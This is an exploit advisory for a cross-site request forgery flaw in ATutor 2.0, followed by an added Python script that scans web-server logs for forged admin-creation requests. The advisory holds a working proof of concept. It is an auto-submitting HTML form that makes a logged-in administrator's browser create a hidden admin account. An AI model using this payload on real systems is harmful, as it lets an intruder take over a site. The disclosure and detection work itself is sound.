ATutor version 2.0 cross-site request forgery exploit that adds a new administrator.
<!------------------------------------------------------------------------
# Software................ATutor 2.0
# Vulnerability...........Cross-site Request Forgery
# Download................http://www.atutor.ca/atutor/
# Release Date............7/5/2010
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................John Leitch
# Site....................http://cross-site-scripting.blogspot.com/
# Email...................john.leitch5@gmail.com
# ------------------------------------------------------------------------
#
# --Description--
#
# A cross-site request forgery vulnerability in ATutor 2.0 can be
# exploited to create a new admin (new_admin/Password1).
#
#
# --PoC-->
<html>
<body onload="document.forms[0].submit.click()">
<form method="POST" action="http://localhost/atutor/mods/_core/users/admins/create.php">
<input type="hidden" name="form_password_hidden" value="70ccd9007338d6d81dd3b6271621b9cf9a97ea00" />
<input type="hidden" name="password_error" value="" />
<input type="hidden" name="login" value="new_admin" />
<input type="hidden" name="password" value="" />
<input type="hidden" name="confirm_password" value="" />
<input type="hidden" name="real_name" value="" />
<input type="hidden" name="email" value="x@x.com" />
<input type="hidden" name="priv_admin" value="1" />
<input type="submit" name="submit" value="Save" />
</form>
</body>
</html>
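
A detection-side companion to the PoC, added here and not part of the original advisory: the forged POST is sent by the logged-in administrator's own browser from another page, so it reaches the server with a Referer that is missing or points off-site. The sketch assumes Apache combined-format access logs; the host name `lms.example`, the function name and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Path taken from the form action in the PoC above.
ADMIN_CREATE_PATH = "/atutor/mods/_core/users/admins/create.php"

# Apache "combined" log format (assumed; adjust if the server logs differently).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

def suspicious_admin_creates(lines, site_hosts):
    """Return (timestamp, client_ip, reason) for POSTs to the admin-create
    page whose Referer is missing or names a host outside site_hosts."""
    allowed = {h.lower() for h in site_hosts}
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        # Ignore any query string when comparing the request path.
        if urlsplit(m["target"]).path != ADMIN_CREATE_PATH:
            continue
        referer = m["referer"]
        if referer in ("", "-"):
            # Lower confidence: some browsers and proxies strip the Referer.
            findings.append((m["ts"], m["ip"], "no Referer"))
            continue
        host = (urlsplit(referer).hostname or "").lower()
        if host not in allowed:
            findings.append((m["ts"], m["ip"], f"cross-site Referer host {host}"))
    return findings

# Constructed sample log lines. The client IP is the administrator's browser
# in every case, which is why the Referer is the useful signal here.
_POST = f'"POST {ADMIN_CREATE_PATH} HTTP/1.1" 302 -'
SAMPLE_LOG = [
    f'192.0.2.10 - - [05/Jul/2010:10:01:12 +0000] {_POST} '
    f'"http://lms.example{ADMIN_CREATE_PATH}" "Mozilla/5.0"',
    f'192.0.2.10 - - [05/Jul/2010:10:07:45 +0000] {_POST} '
    '"http://other.example/page.html" "Mozilla/5.0"',
    f'192.0.2.10 - - [05/Jul/2010:10:09:03 +0000] {_POST} "-" "Mozilla/5.0"',
    '192.0.2.11 - - [05/Jul/2010:10:09:30 +0000] '
    '"GET /atutor/login.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in suspicious_admin_creates(SAMPLE_LOG, {"lms.example"}):
        print(finding)
```

Each hit is worth cross-checking against the administrator list for accounts nobody remembers creating.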